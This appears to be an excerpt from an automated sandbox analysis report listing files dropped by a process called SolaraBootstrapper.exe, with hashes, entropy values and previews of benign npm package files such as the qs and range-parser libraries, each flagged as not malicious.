                                                  Entropy (8bit):5.171170892004588
                                                  Encrypted:false
                                                  SSDEEP:48:kOOrXIJHJzszO432sHI32s3Stc13tfyTHv:NOrXIJHJzYF3U3zxFyTP
                                                  MD5:B289135779DD930509AE81E6041690C0
                                                  SHA1:6ECE366FE750ED915FB98CA184588F90061CAA86
                                                  SHA-256:E7DC37BF662D7F786EFCB46C545615E70C1DAF458A38385521C63CF6607CDFE1
                                                  SHA-512:C2CD7135D2564CAD4C47C27EBB46232C4A7B870061B13496BD443904B59EF00DF62ED681918D0B9DB5445D54CAAEB302E91FB24DD50847D75C6F0A48340F838F
                                                  Malicious:false
                                                  Preview:BSD 3-Clause License..Copyright (c) 2014, Nathan LaFreniere and other [contributors](https://github.com/ljharb/qs/graphs/contributors).All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..1. Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution...3. Neither the name of the copyright holder nor the names of its. contributors may be used to endorse or promote products derived from. this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS".AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE.IMPLIE
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (463)
                                                  Category:dropped
                                                  Size (bytes):20966
                                                  Entropy (8bit):5.140198331589426
                                                  Encrypted:false
                                                  SSDEEP:384:64CMaR4Yc1ZgJ/zh7KF/GFOkKvCzBO7IcxFEi+KeY4twdiKO8t:8R4OJl7oeKvCzY7L4t+t
                                                  MD5:2E307604EDAF4DDAAF2012EDF8A224AE
                                                  SHA1:600F4801DA103EA9CA7AD90E1BC79FF725826940
                                                  SHA-256:4416E51A890E073B0D3237FEA9C545D2E81B1C6C63BEC26CA75B65C8A6F23750
                                                  SHA-512:371C7320CF2A3393D7E52C7E818939C07DD26F8FD4B94DAD78B99A81AE6CB143D0B7D9F02E189F4761B15A63E0F45260F5ABED9408C7F4B470FF01E65031AF68
                                                  Malicious:false
                                                  Preview:# qs <sup>[![Version Badge][npm-version-svg]][package-url]</sup>..[![github actions][actions-image]][actions-url].[![coverage][codecov-image]][codecov-url].[![dependency status][deps-svg]][deps-url].[![dev dependency status][dev-deps-svg]][dev-deps-url].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..[![npm badge][npm-badge-png]][package-url]..A querystring parsing and stringifying library with some added security...Lead Maintainer: [Jordan Harband](https://github.com/ljharb)..The **qs** module was originally created and maintained by [TJ Holowaychuk](https://github.com/visionmedia/node-querystring)...## Usage..```javascript.var qs = require('qs');.var assert = require('assert');..var obj = qs.parse('a=c');.assert.deepEqual(obj, { a: 'c' });..var str = qs.stringify(obj);.assert.equal(str, 'a=c');.```..### Parsing Objects..[](#preventEval).```javascript.qs.parse(string, [options]);.```..**qs** allows you to create nested objects within your query
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (859)
                                                  Category:dropped
                                                  Size (bytes):69136
                                                  Entropy (8bit):5.0138931035003855
                                                  Encrypted:false
                                                  SSDEEP:1536:gGDxzy/W412Qsf7XwM4DCbJQpw1JJR5ZG4C8a7RV5DtWGJBqbuzOwytgv2Zp:SW412Qsf7XwMrHb5ZG4C8a7R99z6
                                                  MD5:7A07B9932F7E5A7CF44CBDE2B89CBC6C
                                                  SHA1:55D05E8834D6583D0200742F9A5B14E0B86C8613
                                                  SHA-256:27D7D7811DDFA98771316D5DC83BBD370E81B982CE982A12EE0A0E319FD20964
                                                  SHA-512:417420A3FAC90D4136E8FAD11F18484B0ADAB5DC998BD7BFCEF9E5BFBD8C93A5B79664DAE588A255A47D718C4D463408657CC04A1C2C973EAB90EB6DBFDD20EA
                                                  Malicious:false
                                                  Preview:(function(f){if(typeof exports==="object"&&typeof module!=="undefined"){module.exports=f()}else if(typeof define==="function"&&define.amd){define([],f)}else{var g;if(typeof window!=="undefined"){g=window}else if(typeof global!=="undefined"){g=global}else if(typeof self!=="undefined"){g=self}else{g=this}g.Qs = f()}})(function(){var define,module,exports;return (function(){function r(e,n,t){function o(i,f){if(!n[i]){if(!e[i]){var c="function"==typeof require&&require;if(!f&&c)return c(i,!0);if(u)return u(i,!0);var a=new Error("Cannot find module '"+i+"'");throw a.code="MODULE_NOT_FOUND",a}var p=n[i]={exports:{}};e[i][0].call(p.exports,function(r){var n=e[i][1][r];return o(n||r)},p,p.exports,r,e,n,t)}return n[i].exports}for(var u="function"==typeof require&&require,i=0;i<t.length;i++)o(t[i]);return o}return r})()({1:[function(require,module,exports){.'use strict';..var replace = String.prototype.replace;.var percentTwenties = /%20/g;..var Format = {. RFC1738: 'RFC1738',. RFC3986: 'R
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):476
                                                  Entropy (8bit):4.710886840910965
                                                  Encrypted:false
                                                  SSDEEP:12:LSiACmX00E1TBA7YEJa+wvoddqadUibZHY:L70o1TBMjwQdYIK
                                                  MD5:74E3187201CE03C0BE48C3D744CE9B93
                                                  SHA1:EDDC3B28123BD9E925B374362465B2488734FFDE
                                                  SHA-256:D4E3DE8B5A4C94865D8ACD6F1C7538144732D466769661160BC0BF6EC9DB3F4F
                                                  SHA-512:39C1C72DC94536ACFF463BE2A1BF7DC28B0E31EC377ABA76F0EC86891EE4CA94B4D7AF1AAA653E500D9E1F8E46538F3AF75469C3AA42ED39EB21D1A7080C0C17
                                                  Malicious:false
                                                  Preview:'use strict';..var replace = String.prototype.replace;.var percentTwenties = /%20/g;..var Format = {. RFC1738: 'RFC1738',. RFC3986: 'RFC3986'.};..module.exports = {. 'default': Format.RFC3986,. formatters: {. RFC1738: function (value) {. return replace.call(value, percentTwenties, '+');. },. RFC3986: function (value) {. return String(value);. }. },. RFC1738: Format.RFC1738,. RFC3986: Format.RFC3986.};.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):211
                                                  Entropy (8bit):4.513556922562984
                                                  Encrypted:false
                                                  SSDEEP:6:Q16PWo/EeWf0NDCMDKzBSGYEwPEwqYecuxs:ucNDPUBAEwPEwg2
                                                  MD5:1459A9952F6B500D24818BB6E3E37368
                                                  SHA1:9039AEF43BEBB9C999E4711D367211CC97B710D3
                                                  SHA-256:8F4E02EEF6CCC43F2B7448C18AE209281C8E9AF9807CAD491DF67450E3817A95
                                                  SHA-512:50365D03580E5DB9FD07FD0771CCB702E5B18173E7200CA3E8C792CADBA571F6EDD5B6CC12458296277143C3C63CD3ADADEB3C8DCA140A6A18C525B107CAE66A
                                                  Malicious:false
                                                  Preview:'use strict';..var stringify = require('./stringify');.var parse = require('./parse');.var formats = require('./formats');..module.exports = {. formats: formats,. parse: parse,. stringify: stringify.};.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):9380
                                                  Entropy (8bit):4.7052565509844655
                                                  Encrypted:false
                                                  SSDEEP:192:c5o1s3b0vlfby2bbEMY8qenkgFE1rugZHbVHIZ4vHyw5FTLShKjb412QEH3v4e18:c55mbEbCFPgZBECR412QEH3v7XwMlA
                                                  MD5:90F8FBD8451FDB537B916F9B2F753456
                                                  SHA1:E7AB39DB4097550EA490330813BE3788738F8D48
                                                  SHA-256:9611D65366166F5F826B647F6F2DC25AD94EB5D0259E9646BFD13784DFCE907C
                                                  SHA-512:24CA0EBD2B5501E956EC240A57B14EB9E204B338E6B0ACCFFC0412E174EB4524F84B4BCA71D8E6785153594159F8AE8730D09D0414FC1C407C94040FE33BBC64
                                                  Malicious:false
                                                  Preview:'use strict';..var utils = require('./utils');..var has = Object.prototype.hasOwnProperty;.var isArray = Array.isArray;..var defaults = {. allowDots: false,. allowPrototypes: false,. allowSparse: false,. arrayLimit: 20,. charset: 'utf-8',. charsetSentinel: false,. comma: false,. decoder: utils.decode,. delimiter: '&',. depth: 5,. ignoreQueryPrefix: false,. interpretNumericEntities: false,. parameterLimit: 1000,. parseArrays: true,. plainObjects: false,. strictNullHandling: false.};..var interpretNumericEntities = function (str) {. return str.replace(/&#(\d+);/g, function ($0, numberStr) {. return String.fromCharCode(parseInt(numberStr, 10));. });.};..var parseArrayValue = function (val, options) {. if (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {. return val.split(',');. }.. return val;.};..// This is what browsers will submit when the . character occurs in an.// application/x-
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):10358
                                                  Entropy (8bit):4.624471165907384
                                                  Encrypted:false
                                                  SSDEEP:192:NDRWpkwbPXYoJB5SqqayEWvufCY6U0dUT+lavIxmwQ3qmlpLZnJU4tAJOFPXxTOe:NDRWpkmPXYoJBh8uku+laj33FJJAs5Xt
                                                  MD5:1CBD67C569A1FAEE16DE2FF17FC8BF10
                                                  SHA1:02D0313C24E068228B98AC886F173F70DE62B39D
                                                  SHA-256:62C4B11841066E8A50A8F53B67DCA13DAEA011DD3F6244456EA25EC2BBE5D834
                                                  SHA-512:DEFCBFCAEE7784CD46D397F8877E2FA0EB63A9B438F5FC1EBCDADC8D5E0A3E67B08BA9DA3E759A78C03363E680F52D54505E1939F15CA95C93DD3AD61A4EADCE
                                                  Malicious:false
                                                  Preview:'use strict';..var getSideChannel = require('side-channel');.var utils = require('./utils');.var formats = require('./formats');.var has = Object.prototype.hasOwnProperty;..var arrayPrefixGenerators = {. brackets: function brackets(prefix) {. return prefix + '[]';. },. comma: 'comma',. indices: function indices(prefix, key) {. return prefix + '[' + key + ']';. },. repeat: function repeat(prefix) {. return prefix;. }.};..var isArray = Array.isArray;.var split = String.prototype.split;.var push = Array.prototype.push;.var pushToArray = function (arr, valueOrArray) {. push.apply(arr, isArray(valueOrArray) ? valueOrArray : [valueOrArray]);.};..var toISO = Date.prototype.toISOString;..var defaultFormat = formats['default'];.var defaults = {. addQueryPrefix: false,. allowDots: false,. charset: 'utf-8',. charsetSentinel: false,. delimiter: '&',. encode: true,. encoder: utils.encode,. encodeValuesOnly: false,. format: defa
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):6823
                                                  Entropy (8bit):4.588218546291734
                                                  Encrypted:false
                                                  SSDEEP:192:zDKQfExDd3InEk0OIhB5oWB76OLMthk2L7KkNOW128RFlxJPyqqXrbFoQPI:zDKQH0hCWhIkOKioI
                                                  MD5:37D7F5EDA99A09F6169DDB31B0800519
                                                  SHA1:8695A4B17CBB4204CEA789012E2426AAAF9489F2
                                                  SHA-256:1A360B096B61CB5D5260E6543ED032677D7DCADB0BCF9BA5C42833CA75622E9B
                                                  SHA-512:8A26ED9530378195313729054CB8B063B496B61769A96AE50339349AD46019C8186C5F6426FC2EC8184D22EFA7CCF546D1124A9B6467D57ED99019E2E9DD4BD6
                                                  Malicious:false
                                                  Preview:'use strict';..var formats = require('./formats');..var has = Object.prototype.hasOwnProperty;.var isArray = Array.isArray;..var hexTable = (function () {. var array = [];. for (var i = 0; i < 256; ++i) {. array.push('%' + ((i < 16 ? '0' : '') + i.toString(16)).toUpperCase());. }.. return array;.}());..var compactQueue = function compactQueue(queue) {. while (queue.length > 1) {. var item = queue.pop();. var obj = item.obj[item.prop];.. if (isArray(obj)) {. var compacted = [];.. for (var j = 0; j < obj.length; ++j) {. if (typeof obj[j] !== 'undefined') {. compacted.push(obj[j]);. }. }.. item.obj[item.prop] = compacted;. }. }.};..var arrayToObject = function arrayToObject(source, options) {. var obj = options && options.plainObjects ? Object.create(null) : {};. for (var i = 0; i < source.length; ++i) {. if (typeof source[i] !== 'u
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2317
                                                  Entropy (8bit):4.49824839481523
                                                  Encrypted:false
                                                  SSDEEP:48:ZDp53ckJ4tgsjtPTRP4Bvag059bMh3LF5q:pD3peiMtmBesJLq
                                                  MD5:8293830097B45284F0FA44658785C307
                                                  SHA1:52165B2DDFEE9D5B878020D2663E838536CD92BB
                                                  SHA-256:1B9FB6E06C92BF2C8944BF2D0139790972C5B68304999699FD197A7ED63876EE
                                                  SHA-512:880E4EC300C79483C71BB762AF8DB91DA6532B364C27512D87912040CE120399EE365609237F33C785037D476BD0A6FF701EDFBAB91234770FD9F5011DF7C587
                                                  Malicious:false
                                                  Preview:{. "name": "qs",. "description": "A querystring parser that supports nesting and arrays, with a depth limit",. "homepage": "https://github.com/ljharb/qs",. "version": "6.11.0",. "repository": {. "type": "git",. "url": "https://github.com/ljharb/qs.git". },. "funding": {. "url": "https://github.com/sponsors/ljharb". },. "main": "lib/index.js",. "contributors": [. {. "name": "Jordan Harband",. "email": "ljharb@gmail.com",. "url": "http://ljharb.codes". }. ],. "keywords": [. "querystring",. "qs",. "query",. "url",. "parse",. "stringify". ],. "engines": {. "node": ">=0.6". },. "dependencies": {. "side-channel": "^1.0.4". },. "devDependencies": {. "@ljharb/eslint-config": "^21.0.0",. "aud": "^2.0.0",. "browserify": "^16.5.2",. "eclint": "^2.8.1",. "eslint": "=8.8.0",. "evalm
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):35871
                                                  Entropy (8bit):4.758761664065293
                                                  Encrypted:false
                                                  SSDEEP:384:f3Nd+AuxA7RLoAUod+6IfippLzzlzzSkLb9/+zdzaNujMjbk+k1LM:f3SAJ79oAUo463ZJGzdza7aA
                                                  MD5:843FD5478400C6414169358EB9237B0C
                                                  SHA1:E585ACC3CCF8923C6CBF2BCC69319A9529C94F97
                                                  SHA-256:DE9C43224E88E49977A3052D9DBA9096CE1F336F0B5DF0AEFCC1059467E88D57
                                                  SHA-512:192890A0044177FC0EDF5C1B97A6B641704B10C810F1263D66B90F4F4105FD87B4D6DA585BF3EC9E528D6EA9464A6A92F53FE56081C9CADE4050C2758D876410
                                                  Malicious:false
                                                  Preview:'use strict';..var test = require('tape');.var qs = require('../');.var utils = require('../lib/utils');.var iconv = require('iconv-lite');.var SaferBuffer = require('safer-buffer').Buffer;..test('parse()', function (t) {. t.test('parses a simple string', function (st) {. st.deepEqual(qs.parse('0=foo'), { 0: 'foo' });. st.deepEqual(qs.parse('foo=c++'), { foo: 'c ' });. st.deepEqual(qs.parse('a[>=]=23'), { a: { '>=': '23' } });. st.deepEqual(qs.parse('a[<=>]==23'), { a: { '<=>': '=23' } });. st.deepEqual(qs.parse('a[==]=23'), { a: { '==': '23' } });. st.deepEqual(qs.parse('foo', { strictNullHandling: true }), { foo: null });. st.deepEqual(qs.parse('foo'), { foo: '' });. st.deepEqual(qs.parse('foo='), { foo: '' });. st.deepEqual(qs.parse('foo=bar'), { foo: 'bar' });. st.deepEqual(qs.parse(' foo = bar = baz '), { ' foo ': ' bar = baz ' });. st.deepEqual(qs.parse('foo=bar=baz'), { foo: 'bar=baz' });. st
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):35186
                                                  Entropy (8bit):4.619525188691518
                                                  Encrypted:false
                                                  SSDEEP:384:f5zbo4PHEZBxpTX8WR1SzD4CmBG/fWDXuBg2rAlHtUzO1kqJ+xDuntWHE0riQt5M:fRot6ZxDuntWHE0S
                                                  MD5:E56C2420CDE1DD52341EE604C5598D06
                                                  SHA1:3D9AD16CAD40BA4A6A43D3D38765EA102A48C299
                                                  SHA-256:9E1EB3E6772609072D168B84ABC20AA511E680244EA98B4CBF49725E31DE7721
                                                  SHA-512:D5D14B4E2F695FE59E23DE6B2A28D3DEA39F5E0598A89298B4B7670AC817F3CD2BDEB24086FDC34D27B843AC27E1B4687D74BDEA73BD6BBB1042FCCBF8062663
                                                  Malicious:false
                                                  Preview:'use strict';..var test = require('tape');.var qs = require('../');.var utils = require('../lib/utils');.var iconv = require('iconv-lite');.var SaferBuffer = require('safer-buffer').Buffer;.var hasSymbols = require('has-symbols');.var hasBigInt = typeof BigInt === 'function';..test('stringify()', function (t) {. t.test('stringifies a querystring object', function (st) {. st.equal(qs.stringify({ a: 'b' }), 'a=b');. st.equal(qs.stringify({ a: 1 }), 'a=1');. st.equal(qs.stringify({ a: 1, b: 2 }), 'a=1&b=2');. st.equal(qs.stringify({ a: 'A_Z' }), 'a=A_Z');. st.equal(qs.stringify({ a: '.' }), 'a=%E2%82%AC');. st.equal(qs.stringify({ a: '.' }), 'a=%EE%80%80');. st.equal(qs.stringify({ a: '.' }), 'a=%D7%90');. st.equal(qs.stringify({ a: '..' }), 'a=%F0%90%90%B7');. st.end();. });.. t.test('stringifies falsy values', function (st) {. st.equal(qs.stringify(undefined), '');. st.equal(qs.stringify(null),
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5112
                                                  Entropy (8bit):4.7086079566914485
                                                  Encrypted:false
                                                  SSDEEP:96:asl0wXxNm1uTbOCgs8vG6gEDSC4vrGBDN+i2Y:asRBF6Cz8vf74viJNR2Y
                                                  MD5:707BA5727EF5EE20C147C1E43F5FE1BF
                                                  SHA1:D418B6E7597AB122D26E1E535BFC57E148134DCF
                                                  SHA-256:4ADBD25416BA0F75CE7AFAF6F71AA430B2AA918FD697F7E978B451C76D770714
                                                  SHA-512:47C7575B529271EE118EB2750F4EA3C9045DDDAFE817752DDCD618F45FC8E2B2628517F5C3EC21D8F6117FA4248730205B1EEEC55FB587C948A9C4F6AE4BF1A2
                                                  Malicious:false
                                                  Preview:'use strict';..var test = require('tape');.var inspect = require('object-inspect');.var SaferBuffer = require('safer-buffer').Buffer;.var forEach = require('for-each');.var utils = require('../lib/utils');..test('merge()', function (t) {. t.deepEqual(utils.merge(null, true), [null, true], 'merges true into null');.. t.deepEqual(utils.merge(null, [42]), [null, 42], 'merges null into an array');.. t.deepEqual(utils.merge({ a: 'b' }, { a: 'c' }), { a: ['b', 'c'] }, 'merges two objects with the same key');.. var oneMerged = utils.merge({ foo: 'bar' }, { foo: { first: '123' } });. t.deepEqual(oneMerged, { foo: ['bar', { first: '123' }] }, 'merges a standalone and an object into an array');.. var twoMerged = utils.merge({ foo: ['bar', { first: '123' }] }, { foo: { second: '456' } });. t.deepEqual(twoMerged, { foo: { 0: 'bar', 1: { first: '123' }, second: '456' } }, 'merges a standalone and two objects into an array');.. var sandwiched = utils.merge({ foo: ['bar', { fi
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):917
                                                  Entropy (8bit):4.4793704622098875
                                                  Encrypted:false
                                                  SSDEEP:24:SvClBfKulHq56dRAqG5L5wJFFXHyAW8HY:cUtE56dHGYJjHTa
                                                  MD5:6FDB98EB13B0D3DD31F0FF795BE6A52B
                                                  SHA1:CD3C379ADD4188F5F4186BCF8FA7A6E7D4F395D0
                                                  SHA-256:AA0D8D70A8C3CDD30685235914CA2422A4E9FD2FA901B166811FA130D05D3F06
                                                  SHA-512:5E48780721BEB2FE1441B4796784EEC26C1BDDB75417563E1DD189E6E52E59F18F02680074BB486D368DF60A1BB940B7A8F1CBE3F08EC74107AD653CBA5B15E2
                                                  Malicious:false
                                                  Preview:1.2.1 / 2019-05-10.==================.. * Improve error when `str` is not a string..1.2.0 / 2016-06-01.==================.. * Add `combine` option to combine overlapping ranges..1.1.0 / 2016-05-13.==================.. * Fix incorrectly returning -1 when there is at least one valid range. * perf: remove internal function..1.0.3 / 2015-10-29.==================.. * perf: enable strict mode..1.0.2 / 2014-09-08.==================.. * Support Node.js 0.6..1.0.1 / 2014-09-07.==================.. * Move repository to jshttp..1.0.0 / 2013-12-11.==================.. * Add repository to package.json. * Add MIT license..0.0.4 / 2012-06-17.==================.. * Change ret -1 for unsatisfiable and -2 when invalid..0.0.3 / 2012-06-17.==================.. * Fix last-byte-pos default to len - 1..0.0.2 / 2012-06-14.==================.. * Add `.type`..0.0.1 / 2012-06-11.==================.. * Initial release.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1178
                                                  Entropy (8bit):5.21865173449101
                                                  Encrypted:false
                                                  SSDEEP:24:5UiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:WiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:D4246FB961A4F121EEF5FFCA47F0B010
                                                  SHA1:43A61F2604C8261E7F03AD44744C387649C480B3
                                                  SHA-256:F655E6291356EC0DE7A8F0E69F294961A2CEA86678EC94588BE1E6A492E278AB
                                                  SHA-512:C4ED365A462F277A23A8A66774ED4435D6E6EB1F331A61F4709944F0504086E8BFA0A7B18FC2F9645DEE18C20FD02E0A6ABD7AEEE09DB0C60BA70A64E559210B
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2012-2014 TJ Holowaychuk <tj@vision-media.ca>.Copyright (c) 2015-2016 Douglas Christopher Wilson <doug@somethingdoug.com..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAG
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):2278
                                                  Entropy (8bit):4.998879354179689
                                                  Encrypted:false
                                                  SSDEEP:48:v3DdC9XRi2NdXMoNjp3wc32JdWQgPBBs9ePc50hvBp3SAW393i53Ap3f3giv3bWv:PBCD15Zl2JdPgPBa9kcEfyJ66fgiPbWv
                                                  MD5:F4B241A4D3C3EAC1D542759D73164083
                                                  SHA1:B3558CBF7EFEEE715175DE415DC67F49C49410E8
                                                  SHA-256:886BF556A8A88ADC2AAC86DA3C8D63106E1C8E7854EB14BC1C095EDC074163F8
                                                  SHA-512:C23AAAA2887136CE8F4EADEF41BDA8CBEB8446143F4F50309E23186ABFF36F49C9922201006E924F272DA84A06180AE38B639D0E06620E4E9BB36BD4C4E40236
                                                  Malicious:false
                                                  Preview:# range-parser..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Node.js Version][node-image]][node-url].[![Build Status][travis-image]][travis-url].[![Test Coverage][coveralls-image]][coveralls-url]..Range header field parser...## Installation..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```sh.$ npm install range-parser.```..## API.. eslint-disable no-unused-vars -->..```js.var parseRange = require('range-parser').```..### parseRange(size, header, options)..Parse the given `header` string where `size` is the maximum size of the resource..An array of ranges will be returned or negative numbers indicating an error parsing... * `-2` signals a malformed header string. * `-1` signals an unsatisfiable range.. eslint-disable no-undef -->..`
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2900
                                                  Entropy (8bit):4.7125797911139164
                                                  Encrypted:false
                                                  SSDEEP:48:63dMSk0GXUF65WerutornZGgbCitbC2mgMcdWNoy+otDUbWpWizPNjC:0RqXT9raoDUgeitu2GczoZO
                                                  MD5:E72576333D27D1C9B3901C4B9E597F27
                                                  SHA1:99F605CD5BA471183657FBF318DBC8E5EC82F042
                                                  SHA-256:38786526D000475300728DB07455AA21D1E37B0F24E48FBC4CB30136AE30B07B
                                                  SHA-512:86A0D770C08B7E61DEA3F63B12736E11737874D32650F263A3728C01C93027ED305FA80AEC05997584E7F6EBE8F78DD0F17C26A1EB5FC4653AFAB501971FCDDA
                                                  Malicious:false
                                                  Preview:/*!. * range-parser. * Copyright(c) 2012-2014 TJ Holowaychuk. * Copyright(c) 2015-2016 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module exports.. * @public. */..module.exports = rangeParser../**. * Parse "Range" header `str` relative to the given file `size`.. *. * @param {Number} size. * @param {String} str. * @param {Object} [options]. * @return {Array}. * @public. */..function rangeParser (size, str, options) {. if (typeof str !== 'string') {. throw new TypeError('argument str must be a string'). }.. var index = str.indexOf('=').. if (index === -1) {. return -2. }.. // split the range string. var arr = str.slice(index + 1).split(','). var ranges = [].. // add ranges type. ranges.type = str.slice(0, index).. // parse all ranges. for (var i = 0; i < arr.length; i++) {. var range = arr[i].split('-'). var start = parseInt(range[0], 10). var end = parseInt(range[1], 10).. // -nnn. if (isNaN(start)) {. start = size - end.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1184
                                                  Entropy (8bit):4.853167582936616
                                                  Encrypted:false
                                                  SSDEEP:24:C3LVpgAT1rxVTSdLPbetK3+nUghTY3WZMCWKXKBBoO8:C3ppFJtVTePbeo3+nUgh0GqBkcBoO8
                                                  MD5:89B7CC42D2831A8061361CA29545F837
                                                  SHA1:E82A50D4BE1C57DED40BF39A5232BF5C6DABB46D
                                                  SHA-256:D0B5F54EAA59001DC86720A9BE1FDF653BAD83707D70842332FB3E8847F65A89
                                                  SHA-512:8676FDCBE03F4E27E56E8BB2CE94864124EC908ABA47CA856A4073A937D9D4CF07A1667567D8D39E50B8B4D5ACE102362739BA933501F475EE9F9DCAB215DE05
                                                  Malicious:false
                                                  Preview:{. "name": "range-parser",. "author": "TJ Holowaychuk <tj@vision-media.ca> (http://tjholowaychuk.com)",. "description": "Range header field string parser",. "version": "1.2.1",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "James Wyatt Cready <wyatt.cready@lanetix.com>",. "Jonathan Ong <me@jongleberry.com> (http://jongleberry.com)". ],. "license": "MIT",. "keywords": [. "range",. "parser",. "http". ],. "repository": "jshttp/range-parser",. "devDependencies": {. "deep-equal": "1.0.1",. "eslint": "5.16.0",. "eslint-config-standard": "12.0.0",. "eslint-plugin-markdown": "1.0.0",. "eslint-plugin-import": "2.17.2",. "eslint-plugin-node": "8.0.1",. "eslint-plugin-promise": "4.1.1",. "eslint-plugin-standard": "4.0.0",. "mocha": "6.1.4",. "nyc": "14.1.1". },. "files": [. "HISTORY.md",. "LICENSE",. "index.js". ],. "engines": {. "node": ">= 0.6". },. "scripts": {. "lint": "eslint --plugi
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):6048
                                                  Entropy (8bit):4.790078545667384
                                                  Encrypted:false
                                                  SSDEEP:96:yir0vpiCxwTLLDxTozlyF2U8EQizn31frw6G7guHsqga4gJ6EwD:ygLVClU8EQizn31TvG7g6sfbgq
                                                  MD5:92DF122B507AC7FEAF5BF891873FD5A4
                                                  SHA1:045515E9495ED3976F52B2F82DB7F6E8482CF8A6
                                                  SHA-256:6CC8EDB23C7231759530513A8A12A59E1828B3201D92F93265D322F22B9BC3E3
                                                  SHA-512:1646D86B9B2D6F4812DBEB0E8C8E47FB7B9154CAB5117995147635F817053889FBBD8597C1625E91CED4EE06CDCE00944C68254DE58BA4E50F0CC3C18B0C42AB
                                                  Malicious:false
                                                  Preview:2.5.2 / 2023-02-21.==================.. * Fix error message for non-stream argument..2.5.1 / 2022-02-28.==================.. * Fix error on early async hooks implementations..2.5.0 / 2022-02-21.==================.. * Prevent loss of async hooks context. * Prevent hanging when stream is not readable. * deps: http-errors@2.0.0. - deps: depd@2.0.0. - deps: statuses@2.0.1..2.4.3 / 2022-02-14.==================.. * deps: bytes@3.1.2..2.4.2 / 2021-11-16.==================.. * deps: bytes@3.1.1. * deps: http-errors@1.8.1. - deps: setprototypeof@1.2.0. - deps: toidentifier@1.0.1..2.4.1 / 2019-06-25.==================.. * deps: http-errors@1.7.3. - deps: inherits@2.0.4..2.4.0 / 2019-04-17.==================.. * deps: bytes@3.1.0. - Add petabyte (`pb`) support. * deps: http-errors@1.7.2. - Set constructor name when possible. - deps: setprototypeof@1.1.1. - deps: statuses@'>= 1.5.0 < 2'. * deps: iconv-lite@0.4.24. - Added encoding MIK..2.3.3 / 2018-05-08.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1181
                                                  Entropy (8bit):5.205541824014001
                                                  Encrypted:false
